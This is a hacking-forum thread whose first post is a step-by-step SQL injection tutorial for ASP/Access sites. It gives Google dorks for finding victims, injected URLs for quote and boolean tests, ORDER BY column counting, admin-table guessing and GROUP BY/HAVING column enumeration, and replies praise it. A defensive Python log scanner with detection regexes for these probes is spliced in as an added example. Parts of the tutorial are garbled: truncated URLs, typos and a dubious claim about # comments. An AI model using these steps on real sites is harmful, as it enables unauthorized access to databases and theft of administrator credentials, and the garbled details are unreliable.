| Web Hacking & War Games Discuss f.ex. SQL injection and legal hacking here. |
#1
[+] Asp Vulnerability
A Basic Tutorial on injection(ASP)

Step 1:
------
Good dork:
site:.org inurl:.asp?id=
site:.com inrul:.aspx?=
site:.co.uk inurl:.asp?cid=
Or you can figure out your own dork.

Step 2:
-------
Let's say we found this
Code:
http://www.site.com
We will crawl around it until we get to this
Code:
http://www.site.com/en/pressread.asp?id=563
We should see the normal page. I will put a single quote and see what we could come up with; the resultant URL is
Code:
http://www.site.com/en/pressread.asp?id=563'
Now you should see an error like this:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=563' ;'.
/en/includes/configdb.asp, line 23

The error message on the second line says that we have a great chance to inject here, so we proceed with the 1+and+1 test:
Code:
http://www.site.com/en/press...d=563+AND+1=1#

NOTE:
----
In ASP we will use the # for commenting out the rest of the query instead of -- or /* .
If you got an error that says type mismatch, like int or string something, we can figure out that the input is being checked for data type. If you insist, then we should find a site that accepts both int and char in the input.

Now we are going to use AND+1=0#
Code:
http://www.site.com/en/pressread.asp?id=563+AND+1=0#
If you get an incomplete page or an error such as:

ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
/en/pressread.asp, line 44

Now we need to find the column number; for that we will use the ORDER BY command.

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine does not recognize '10' as a valid field name or expression.
/en/includes/configdb.asp, line 23

That error is like our MySQL error Unknown column '10'. We will keep on decreasing until we are on the correct number. For our example that should be ... 9
Code:
http://www.site.com/en/pressread.asp...3,4,5,6,7,8,9#
At this point you should see another error:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC Microsoft Access Driver] Query input must contain at least one table or query.
/en/includes/configdb.asp, line 23

The query will not execute, because the query needs an existing table to successfully execute. We will keep guessing until we get an existing table, otherwise we will get this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot find the input table or query 'admin'. Make sure it exists and that its name is spelled correctly.
/en/includes/configdb.asp, line 23

That error means the table used does not exist. Possible tables that work most of the time are:
user username users admin administrator login news sysobjects customers .............

Our example will be OK with table admin and ....
Code:
http://www.site.com/en/pressread.asp...,7+from+admin#
We should still see the error; ignore it and look beside the 'PRESS RELEASES >', where you should see the number 4. At this point I think any smart guy can find out about the column names, etc.

Step 3:
------
We can find the column names by using HAVING BY, for example:
HAVING 1=1 --
GROUP BY table.columnfromerror1 HAVING 1=1 --
GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 --
and on and on ...

THAT'S ALL ..
Best Regards to my friends Malvo, Eddy and zero
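A defender's view of the probe sequence in the post above, as an added example that is not part of the original thread: a Python script that scans web-server log lines for the stages the tutorial walks through (single quote, AND 1=1 / AND 1=0, ORDER BY n, HAVING / GROUP BY) and flags clients that hit several of them. The four-field log format, the regexes, the function names and the sample lines are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probe stages named in the post; the regexes are this example's own assumptions.
STAGES = [
    ("quote",    re.compile(r"=\s*\d+\s*'")),
    ("boolean",  re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("order_by", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("having",   re.compile(r"\bhaving\s+\d+\s*=\s*\d+|\bgroup\s+by\s+[\w.]+", re.I)),
]

def classify(query):
    """Return the set of probe stages seen in one raw query-string value."""
    decoded = unquote_plus(query)  # '+' and %xx as the server would decode them
    return {name for name, rx in STAGES if rx.search(decoded)}

def suspects(log_lines, min_stages=2):
    """Map client IP -> stages hit and 5xx count, for clients reaching min_stages."""
    stages, errors = defaultdict(set), defaultdict(int)
    for line in log_lines:
        if line.startswith("#") or not line.strip():
            continue  # skip header directives and blank lines
        ip, _stem, query, status = line.split()
        stages[ip] |= classify(query)
        errors[ip] += status.startswith("5")  # the post relies on 500-style errors
    return {ip: {"stages": sorted(s), "server_errors": errors[ip]}
            for ip, s in stages.items() if len(s) >= min_stages}

# Constructed sample log: fields are c-ip cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
#Fields: c-ip cs-uri-stem cs-uri-query sc-status
203.0.113.7 /en/pressread.asp id=563 200
203.0.113.7 /en/pressread.asp id=563' 500
203.0.113.7 /en/pressread.asp id=563+AND+1=1 200
203.0.113.7 /en/pressread.asp id=563+AND+1=0 500
203.0.113.7 /en/pressread.asp id=563+ORDER+BY+10 500
203.0.113.7 /en/pressread.asp id=563+HAVING+1=1 500
198.51.100.4 /en/pressread.asp id=564 200
198.51.100.4 /en/search.asp q=rock+and+roll 200
198.51.100.9 /en/pressread.asp id=12%27 500
""".splitlines()

if __name__ == "__main__":
    for ip, info in suspects(SAMPLE_LOG).items():
        print(ip, info)
```

A single stray quote (the last sample client) stays below the default threshold; it is the progression through several stages, paired with a run of 5xx responses, that marks the pattern.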
#2
Re: [+] Asp Vulnerability
So, where's the how to root the server via MS-SQL afterwards? :D jk Nice thread, i liked it even though it is almost the same as MySQL, but not 100% ;) +Repz
#3
Re: [+] Asp Vulnerability
wow dude nice tutorial xD +rep
__________________ OSWP Certified
#4
Re: [+] Asp Vulnerability
Thanx Max n Xero for the suggestions .... but i need to try some more of it ....
#5
Re: [+] Asp Vulnerability
thx for share